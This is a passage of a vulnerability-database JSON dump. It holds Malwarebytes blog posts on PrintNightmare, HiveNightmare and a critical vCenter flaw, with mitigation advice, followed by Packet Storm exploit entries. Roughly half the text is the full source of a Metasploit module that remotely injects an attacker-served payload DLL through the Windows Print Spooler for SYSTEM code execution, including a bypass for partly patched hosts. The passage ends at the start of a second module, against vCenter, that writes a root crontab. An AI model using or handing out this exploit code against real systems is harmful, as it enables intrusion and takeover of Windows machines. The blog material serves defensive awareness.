"published": "2021-08-12T11:30:26", "type": "malwarebytes", "title": "Microsoft\u2019s PrintNightmare continues, shrugs off Patch Tuesday fixes", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527", "CVE-2021-36958"], "modified": "2021-08-12T11:30:26", "id": "MALWAREBYTES:7F8FC685D6EFDE8FC4909FDA86D496A5", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/microsofts-printnightmare-continues-shrugs-off-patch-tuesday-fixes/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-31T08:36:55", "description": "Users with low privileges can access sensitive Registry database files on Windows 10 and Windows 11, leaving them vulnerable to a local elevation of privilege vulnerability known as SeriousSAM or HiveNightmare.\n\nDoesn't sound serious? Reassured that users must already have access to the system and be able to execute code on said system to use this vulnerability? Don't be.\n\nUsing SeriousSAM, a user can access multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. The attacker would then have full control, which means they can install programs, view, change, or delete data, and create new accounts with full user rights. 
Which is exactly what an attacker wants.\n\n### My mama said\n\nSAM stands for Security Accounts Manager and it is supposed to be a protected database that can only be accessed by users with Administrator privileges. This was designed as such because the database contains the hashed passwords for all users on a system.\n\nNow, I\u2019ve always been taught that anyone with physical access to your system, and enough knowledge, can take it over. One of the reasons why this is true is that the \u201cholder\u201d of the system can dump those sensitive Registry database files _when Windows is not running_. \n\nWhen Windows is not running, the registry is not \u201cmounted\u201d and the "access violation" protection is inactive, since to another operating system (OS) they are just files like any other. You can see the caveat there. You need to look at the files from an external OS to pull this off. (I will leave the \u201chow to\u201d do that to your imagination.)\n\nWhile dumping a registry hive from an inactive Windows machine like that may sound daunting to some, and difficult for malware to pull off, SeriousSAM makes it much easier. SeriousSAM removes the need for that external OS, and for Windows to be off, making it a much more achievable trick. It allows users (or malicious programs inadvertently run by those users) to bypass the "access violation" protection on the computer they're using, while it's running.\n\n### Pass the hash\n\n"But the passwords are hashed!", I heard you thinking. In that case, meet pass-the-hash attacks. Windows NT LAN Manager (NTLM) is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain. When the client requests access to a service associated with the domain, the service sends a challenge to the client, requiring the client to perform a mathematical operation using its authentication token, and then return the result of this operation to the service. 
The service may validate the result or send it to the Domain Controller (DC) for validation. If the service or DC confirms that the client\u2019s response is correct, the service allows access to the client. Sounds secure, right? Well, the fun part is that with the hash you have enough information to perform that \u201cmathematical operation\u201d required to gain access. The authentication process does not require the plaintext password. The hash is enough. \n\nSo, _pass the hash_ is the name for a technique that allows an attacker to authenticate to a remote server or service by using the hash of a user's password, instead of requiring the associated plaintext password as is normally the case.\n\n### Made easy\n\nThe vulnerability we have been referring to as SeriousSAM is listed as [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>) and while it is unclear exactly which versions of Windows are vulnerable, it looks as if some versions of Windows 10 and all versions of Windows 11 are affected, as long as System Protection, aka Shadow Volumes, is enabled. The Microsoft advisory says "\u2026we can confirm that this issue affects Windows 10 version 1809 and newer operating systems". The company is researching the issue and we will update this post once we know more.\n\nThe vulnerability got its other name, HiveNightmare, because it affects registry hives, and as a reference to the recently discovered [PrintNightmare](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) vulnerabilities in the Windows Print Spooler service. I think it's a better name for this vulnerability because SAM is not the only sensitive Registry database that's affected. Others are all stored in the `%windir%\\system32\\config` folder, as is SAM. They are SYSTEM, SECURITY, DEFAULT, and SOFTWARE. 
Which means there might be more options for hackers with limited access to raise privileges or achieve remote code execution waiting to be found.\n\nThe underlying problem is, in Microsoft's own words, "overly permissive Access Control Lists (ACLs) on multiple system files". Those lax permissions are carried over into the Shadow copies, where the files are unmounted and as unprotected as the files on the dormant computer my mother warned me about. So, any user can dump the database from the Shadow copy and as such create a readable database.\n\nShadow Volumes are enabled by default, so that doesn\u2019t bring the number of systems at risk down a lot. It is a useful option, but in this case it is also what enables this vulnerability. \n\n### Mitigation\n\nWhile Microsoft is expected to come up with an out-of-band patch for this vulnerability, there are some things you can do to defeat the vulnerability. Whatever you do to address the problem, note that fixing the cause does not necessarily fix broken permissions in shadow copies you have already taken.\n\nYou can find some useful commands for discovering if your systems have Shadow copies enabled, and whether they are vulnerable, in the [CERT advisory](<https://www.kb.cert.org/vuls/id/506989>). 
The advisory notes that "simply having a system drive that is larger than 128GB in size and then performing a Windows Update or installing an MSI will ensure that a VSS shadow copy will be automatically created."\n\nMicrosoft recommends restricting access to the problematic folder and deleting Volume Shadow Copy Service (VSS) shadow copies to mitigate this issue.\n\n**Restrict access to the contents of `%windir%\\system32\\config`**\n\n * Open Command Prompt or Windows PowerShell as an administrator.\n * Run this command: icacls %windir%\\system32\\config\\\\*.* /inheritance:e\n\n**Delete Volume Shadow Copy Service (VSS) shadow copies**\n\n * Delete any System Restore points and Shadow volumes that existed prior to restricting access to `%windir%\\system32\\config`.\n * Create a new System Restore point (if desired).\n\n**Note: Deleting shadow copies could impact restore operations, including the ability to restore data with third-party backup applications.**\n\nThe post [HiveNightmare zero-day lets anyone be SYSTEM on Windows 10 and 11](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/hivenightmare-zero-day-lets-anyone-be-system-on-windows-10-and-11/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-07-21T14:31:50", "type": "malwarebytes", "title": "HiveNightmare zero-day lets anyone be SYSTEM on Windows 10 and 11", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-21T14:31:50", "id": "MALWAREBYTES:17B7F98583E0297FC4ECAB159A115DB9", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/hivenightmare-zero-day-lets-anyone-be-system-on-windows-10-and-11/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T20:35:10", "description": "### Last week on Malwarebytes Labs\n\n * Freedom Hosting operator [gets 27 
years](<https://blog.malwarebytes.com/cybercrime/2021/09/freedom-hosting-operator-gets-27-years-for-hosting-dark-web-child-abuse-sites/>) for hosting dark web abuse sites\n * Microsoft makes a [bold move](<https://blog.malwarebytes.com/opinion/2021/09/microsoft-makes-a-bold-move-towards-a-password-less-future/>) towards a password-less future\n * New Mac malware masquerades as [iTerm2, remote desktop and other apps](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/new-mac-malware-masquerades-as-iterm2-remote-desktop-and-other-apps/>)\n * Internet safety tips for kids and teens: a [comprehensive guide](<https://blog.malwarebytes.com/how-tos-2/2021/09/internet-safety-tips-for-kids-and-teens-a-comprehensive-guide-for-the-modern-parent/>) for the modern parent\n * Google, geofence warrants, [and you](<https://blog.malwarebytes.com/privacy-2/2021/09/google-geofence-warrants-and-you/>)\n * No, Colonel Gaddafi\u2019s daughter isn\u2019t [emailing to give you untold riches](<https://blog.malwarebytes.com/social-engineering/2021/09/no-colonel-gaddafis-daughter-isnt-emailing-to-give-you-untold-riches/>)\n * Patch vCenter Server \u201c[right now](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/>)\u201d, VMWare expects CVE-2021-22005 exploitation within minutes of disclosure\n * [Patch now](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-insecure-hikvision-security-cameras-can-be-taken-over-remotely/>)! 
Insecure Hikvision security cameras can be taken over remotely\n * MSHTML [attack targets Russian state rocket centre](<https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/>) and interior ministry\n * Italian mafia cybercrime sting leads to [100+ arrests](<https://blog.malwarebytes.com/scams/2021/09/italian-mafia-cybercrime-sting-leads-to-100-arrests/>)\n * How to [clear your cache](<https://blog.malwarebytes.com/101/how-tos/2021/09/how-to-clear-your-cache/>)\n * Microsoft exchange autodiscover flaw [reveals users\u2019 passwords](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/microsoft-exchange-autodiscover-flaw-reveals-users-passwords/>)\n * Parents and teachers believe digital surveillance of kids [outweighs risks](<https://blog.malwarebytes.com/privacy-2/2021/09/parents-and-teachers-believe-digital-surveillance-of-kids-outweighs-risks/>)\n * SonicWall warns users to [patch critical vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/sonicwall-warns-users-to-patch-critical-vulnerability-as-soon-as-possible/>) \u201cas soon as possible\u201d\n * Beware! 
Uber scam [lures victims](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/beware-uber-scam-lures-victims-with-alert-from-a-real-uber-number/>) with alert from a real Uber number\n * Teaching [cybersecurity skills to special needs children](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/teaching-cybersecurity-skills-to-special-needs-children-with-alana-robinson-lock-and-code-s02e18/>) with Alana Robinson: Lock and Code S02E18\n\n### Other cybersecurity news\n\n * UK ministry of defence [apologises](<https://www.theregister.com/2021/09/23/afghan_email_fail_ministry_defence/>) - again - after another major email blunder in Afghanistan (Source: The Register)\n * Database containing personal info of 106 million international visitors to Thailand [exposed](<https://www.comparitech.com/blog/information-security/thai-traveler-data-leak/>) online (Source: Comparitech)\n * Fake WhatsApp backup message [delivers malware](<https://portswigger.net/daily-swig/fake-whatsapp-backup-message-delivers-malware-to-spanish-speakers-devices>) to Spanish speakers\u2019 devices (Source: The Daily Swig)\n * Mobile phones of 5 French cabinet ministers [infected by Pegasus malware](<https://www.france24.com/en/europe/20210924-mobile-phones-of-five-french-cabinet-ministers-infected-by-pegasus-malware>) (Source: France 24)\n * Ransomware dropping malware swaps phishing for [sneaky new attack route](<https://www.zdnet.com/article/this-ransomware-dropping-malware-has-swapped-phishing-for-a-sneaky-new-attack-route/>) (Source: ZDNet)\n * Phishing attacks more sophisticated, malicious emails [timed to coincide](<https://www.cpomagazine.com/cyber-security/phishing-attacks-more-sophisticated-malicious-emails-timed-to-coincide-with-periods-of-low-energy-and-inattentiveness/>) with periods of low energy and inattentiveness (Source: CPO magazine)\n * Keeping your data [secure at work](<https://minutehack.com/news/keeping-your-data-secure-at-work>) (Source: Minute Hack)\n\nStay safe, 
everyone!\n\nThe post [A week in security (Sept 20 \u2013 Sept 26)](<https://blog.malwarebytes.com/a-week-in-security/2021/09/a-week-in-security-sept-20-sept-26-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-27T11:01:42", "type": "malwarebytes", "title": "A week in security (Sept 20 \u2013 Sept 26)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T11:01:42", "id": "MALWAREBYTES:F776F8D86D7BD9350BDC23F1E51B31BF", "href": "https://blog.malwarebytes.com/a-week-in-security/2021/09/a-week-in-security-sept-20-sept-26-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T20:35:11", "description": "VMware is urging users of vCenter Server to patch no fewer than [19 problems](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) affecting its products. \n\nThese updates fix a variety of security vulnerabilities, but one of them is particularly nasty. That would be [CVE-2021-22005](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22005>), a critical file upload vulnerability with a CVSS score of 9.8 out of 10.\n\nIt's so bad the company is advising users to **sort it out "[right now](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>)"**:\n\n> These updates fix a critical security vulnerability, and your response needs to be considered at once. Organizations that practice change management using the ITIL definitions of change types would consider this an \u201cemergency change.\u201d\n\n### CVE-2021-22005\n\nvCenter Server is a way to [manage large infrastructure](<https://geek-university.com/vmware-esxi/what-is-vcenter-server/>). If you have lots of hosts and virtual machines, this is a very good way to manage every aspect of your setup. 
With this in mind, if someone manages to compromise your vCenter, it probably won't end well.\n\nAnd that's exactly what CVE-2021-22005 allows. It's a file upload vulnerability, and anyone with access to vCenter Server over a network can exploit it. The configuration settings of vCenter Server don't make any difference. If criminals get network access, they can upload a specially made file and use it to execute code on the vCenter Server.\n\nAs VMware points out, bad actors are often already in your network. They wait patiently to strike. It's likely they'll exfiltrate data slowly and nobody will ever know they're there. Being able to snag a win like this for themselves could increase the threat from ransomware and other malicious activity.\n\n### What should I do?\n\nWell, patching immediately is definitely the [go-to advice](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>). VMware acknowledges that an emergency patch may fall outside how you usually do things, but it really does impress upon readers that patching needs to be done as soon as possible. It is, perhaps, unusual (and refreshing) to see an organisation stress this fact so plainly, so kudos for being so forthright.\n\n### Is my vCenter setup affected by this?\n\nIt depends. Some versions, such as vCenter Server 6.5, are not affected. Others are. You should refer to the [dedicated rundown on](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>) this issue and take appropriate action as soon as you possibly can. 
We'll leave the last word to VMware with regard to when you should be patching:\n\n> Immediately, the ramifications of this vulnerability are serious and it is a matter of time \u2013 likely minutes after the disclosure \u2013 before working exploits are publicly available.\n> \n> With the threat of ransomware looming nowadays the safest stance is to assume that an attacker may already have control of a desktop and a user account through the use of techniques like phishing or spearphishing, and act accordingly. This means the attacker may already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence.\n\nThis seems like very good advice.\n\nThe post [Patch vCenter Server "right now", VMWare expects CVE-2021-22005 exploitation within minutes of disclosure](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T11:27:11", "type": "malwarebytes", "title": "Patch vCenter Server \u201cright now\u201d, VMWare expects CVE-2021-22005 exploitation within minutes of disclosure", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T11:27:11", "id": "MALWAREBYTES:8791EE404FCD2E2A063F220E6486B422", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-05-25T15:25:18", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 
"NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-25T00:00:00", "type": "packetstorm", "title": "Print Spooler Remote DLL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-05-25T00:00:00", "id": "PACKETSTORM:167261", "href": "https://packetstormsecurity.com/files/167261/Print-Spooler-Remote-DLL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'windows_error' \nrequire 'ruby_smb' \nrequire 'ruby_smb/error' \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::DCERPC \ninclude Msf::Exploit::Remote::SMB::Client::Authenticated \ninclude Msf::Exploit::Remote::SMB::Server::Share \ninclude Msf::Exploit::Retry \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Deprecated \n \nmoved_from 'auxiliary/admin/dcerpc/cve_2021_1675_printnightmare' \n \nPrintSystem = RubySMB::Dcerpc::PrintSystem \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Print Spooler Remote DLL Injection', \n'Description' => %q{ \nThe print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted \nDCERPC request, resulting in remote code execution 
as NT AUTHORITY\\SYSTEM. This module uses the MS-RPRN \nvector which requires the Print Spooler service to be running. \n}, \n'Author' => [ \n'Zhiniang Peng', # vulnerability discovery / research \n'Xuefeng Li', # vulnerability discovery / research \n'Zhipeng Huo', # vulnerability discovery \n'Piotr Madej', # vulnerability discovery \n'Zhang Yunhai', # vulnerability discovery \n'cube0x0', # PoC \n'Spencer McIntyre', # metasploit module \n'Christophe De La Fuente', # metasploit module co-author \n], \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'SRVHOST' => Rex::Socket.source_address \n}, \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'Targets' => [ \n[ \n'Windows', { \n'Platform' => 'win', \n'Arch' => [ ARCH_X64, ARCH_X86 ] \n}, \n], \n], \n'DisclosureDate' => '2021-06-08', \n'References' => [ \n['CVE', '2021-1675'], \n['CVE', '2021-34527'], \n['URL', 'https://github.com/cube0x0/CVE-2021-1675'], \n['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'], \n['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'], \n['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream'] \n], \n'Notes' => { \n'AKA' => [ 'PrintNightmare' ], \n'Stability' => [CRASH_SERVICE_DOWN], \n'Reliability' => [UNRELIABLE_SESSION], \n'SideEffects' => [ \nARTIFACTS_ON_DISK # the dll will be copied to the remote server \n] \n} \n) \n) \n \nregister_advanced_options( \n[ \nOptInt.new('ReconnectTimeout', [ true, 'The timeout in seconds for reconnecting to the named pipe', 10 ]) \n] \n) \nderegister_options('AutoCheck') \nend \n \ndef check \nbegin \nconnect(backend: :ruby_smb) \nrescue Rex::ConnectionError \nreturn Exploit::CheckCode::Unknown('Failed to connect to the remote service.') \nend \n \nbegin \nsmb_login \nrescue Rex::Proto::SMB::Exceptions::LoginError \nreturn Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.') \nend \n \nbegin \ndcerpc_bind_spoolss \nrescue 
RubySMB::Error::UnexpectedStatusCode => e \nnt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first \nif nt_status == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND \nprint_error(\"The 'Print Spooler' service is disabled.\") \nend \nreturn Exploit::CheckCode::Safe(\"The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).\") \nend \n \n@target_arch = dcerpc_getarch \n# see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43 \nif @target_arch == ARCH_X64 \n@environment = 'Windows x64' \nelsif @target_arch == ARCH_X86 \n@environment = 'Windows NT x86' \nelse \nreturn Exploit::CheckCode::Detected('Successfully bound to the remote service.') \nend \n \nprint_status(\"Target environment: Windows v#{simple.client.os_version} (#{@target_arch})\") \n \nprint_status('Enumerating the installed printer drivers...') \ndrivers = enum_printer_drivers(@environment) \n@driver_path = \"#{drivers.driver_path.rpartition('\\\\').first}\\\\UNIDRV.DLL\" \nvprint_status(\"Using driver path: #{@driver_path}\") \n \nprint_status('Retrieving the path of the printer driver directory...') \n@config_directory = get_printer_driver_directory(@environment) \nvprint_status(\"Using driver directory: #{@config_directory}\") unless @config_directory.nil? 
\n \ncontainer = driver_container( \np_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll', \np_data_file: \"\\\\??\\\\UNC\\\\127.0.0.1\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}.dll\" \n) \n \ncase add_printer_driver_ex(container) \nwhen nil # prevent the module from erroring out in case the response can't be mapped to a Win32 error code \nreturn Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable.') \nwhen ::WindowsError::Win32::ERROR_PATH_NOT_FOUND \nreturn Exploit::CheckCode::Vulnerable('Received ERROR_PATH_NOT_FOUND, implying the target is vulnerable.') \nwhen ::WindowsError::Win32::ERROR_BAD_NET_NAME \nreturn Exploit::CheckCode::Vulnerable('Received ERROR_BAD_NET_NAME, implying the target is vulnerable.') \nwhen ::WindowsError::Win32::ERROR_ACCESS_DENIED \nreturn Exploit::CheckCode::Safe('Received ERROR_ACCESS_DENIED implying the target is patched.') \nend \n \nExploit::CheckCode::Detected('Successfully bound to the remote service.') \nend \n \ndef run \nfail_with(Failure::BadConfig, 'Can not use an x64 payload on an x86 target.') if @target_arch == ARCH_X86 && payload.arch.first == ARCH_X64 \nfail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported.') if @environment.nil? \nfail_with(Failure::Unknown, 'Failed to enumerate the driver directory.') if @config_directory.nil? 
\n \nsuper \nend \n \ndef setup \nif Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0 \nfail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.') \nend \n \nsuper \nend \n \ndef start_service \nfile_name << '.dll' \nself.file_contents = generate_payload_dll \n \nsuper \nend \n \ndef primer \ndll_path = unc \nif dll_path =~ /^\\\\\\\\([\\w:.\\[\\]]+)\\\\(.*)$/ \n# targets patched for CVE-2021-34527 (but with Point and Print enabled) need to use this path style as a bypass \n# otherwise the operation will fail with ERROR_INVALID_PARAMETER \ndll_path = \"\\\\??\\\\UNC\\\\#{Regexp.last_match(1)}\\\\#{Regexp.last_match(2)}\" \nend \nvprint_status(\"Using DLL path: #{dll_path}\") \n \nfilename = dll_path.rpartition('\\\\').last \ncontainer = driver_container(p_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll', p_data_file: dll_path) \n \n3.times do \nadd_printer_driver_ex(container) \nend \n \n1.upto(3) do |directory| \ncontainer.driver_info.p_config_file.assign(\"#{@config_directory}\\\\3\\\\old\\\\#{directory}\\\\#(unknown)\") \nbreak if add_printer_driver_ex(container).nil? 
\nend \n \ncleanup_service \nend \n \ndef driver_container(**kwargs) \nPrintSystem::DriverContainer.new( \nlevel: 2, \ntag: 2, \ndriver_info: PrintSystem::DriverInfo2.new( \nc_version: 3, \np_name_ref_id: 0x00020000, \np_environment_ref_id: 0x00020004, \np_driver_path_ref_id: 0x00020008, \np_data_file_ref_id: 0x0002000c, \np_config_file_ref_id: 0x00020010, \n# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913 \np_name: \"#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}\", \np_environment: @environment, \np_driver_path: @driver_path, \n**kwargs \n) \n) \nend \n \ndef dcerpc_bind_spoolss \nhandle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\\\spoolss']) \nvprint_status(\"Binding to #{handle} ...\") \ndcerpc_bind(handle) \nvprint_status(\"Bound to #{handle} ...\") \nend \n \ndef enum_printer_drivers(environment) \nresponse = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2) \nresponse = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed) \nfail_with(Failure::UnexpectedReply, 'Failed to enumerate printer drivers.') unless response.p_drivers&.length \nDriverInfo2.read(response.p_drivers.map(&:chr).join) \nend \n \ndef get_printer_driver_directory(environment) \nresponse = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2) \nresponse = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed) \nfail_with(Failure::UnexpectedReply, 'Failed to obtain the printer driver directory.') unless response.p_driver_directory&.length \nRubySMB::Field::Stringz16.read(response.p_driver_directory.map(&:chr).join).encode('ASCII-8BIT') \nend \n \ndef add_printer_driver_ex(container) \nflags = PrintSystem::APD_INSTALL_WARNED_DRIVER | 
PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES \n \nbegin \nresponse = rprn_call('RpcAddPrinterDriverEx', p_name: \"\\\\\\\\#{datastore['RHOST']}\", p_driver_container: container, dw_file_copy_flags: flags) \nrescue RubySMB::Error::UnexpectedStatusCode => e \nnt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first \nmessage = \"Error #{nt_status.name} (#{nt_status.description})\" \nif nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN \n# STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected \nprint_status('The named pipe connection was broken, reconnecting...') \nreconnected = retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do \ndcerpc_bind_spoolss \nrescue RubySMB::Error::CommunicationError, RubySMB::Error::UnexpectedStatusCode => e \nfalse \nelse \ntrue \nend \n \nunless reconnected \nvprint_status('Failed to reconnect to the named pipe.') \nreturn nil \nend \n \nprint_status('Successfully reconnected to the named pipe.') \nretry \nelse \nprint_error(message) \nend \n \nreturn nt_status \nend \n \nerror = ::WindowsError::Win32.find_by_retval(response.error_status.value).first \nmessage = \"RpcAddPrinterDriverEx response #{response.error_status}\" \nmessage << \" #{error.name} (#{error.description})\" unless error.nil? 
\nvprint_status(message) \nerror \nend \n \ndef rprn_call(name, **kwargs) \nrequest = PrintSystem.const_get(\"#{name}Request\").new(**kwargs) \n \nbegin \nraw_response = dcerpc.call(request.opnum, request.to_binary_s) \nrescue Rex::Proto::DCERPC::Exceptions::Fault => e \nfail_with(Failure::UnexpectedReply, \"The #{name} Print System RPC request failed (#{e.message}).\") \nend \n \nPrintSystem.const_get(\"#{name}Response\").read(raw_response) \nend \n \nclass DriverInfo2Header < BinData::Record \nendian :little \n \nuint32 :c_version \nuint32 :name_offset \nuint32 :environment_offset \nuint32 :driver_path_offset \nuint32 :data_file_offset \nuint32 :config_file_offset \nend \n \n# this is a partial implementation that just parses the data, this is *not* the same struct as PrintSystem::DriverInfo2 \n# see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030 \nDriverInfo2 = Struct.new(:header, :name, :environment, :driver_path, :data_file, :config_file) do \ndef self.read(data) \nheader = DriverInfo2Header.read(data) \nnew( \nheader, \nRubySMB::Field::Stringz16.read(data[header.name_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.environment_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.driver_path_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.data_file_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.config_file_offset..]).encode('ASCII-8BIT') \n) \nend \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/167261/cve_2021_1675_printnightmare.rb.txt"}, {"lastseen": "2021-10-07T14:18:18", "description": "", "cvss3": {}, "published": "2021-10-07T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server Analytics (CEIP) Service File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": 
["CVE-2021-22005"], "modified": "2021-10-07T00:00:00", "id": "PACKETSTORM:164439", "href": "https://packetstormsecurity.com/files/164439/VMware-vCenter-Server-Analytics-CEIP-Service-File-Upload.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload', \n'Description' => %q{ \nThis module exploits a file upload in VMware vCenter Server's \nanalytics/telemetry (CEIP) service to write a system crontab and \nexecute shell commands as the root user. \n \nNote that CEIP must be enabled for the target to be exploitable by \nthis module. CEIP is enabled by default. 
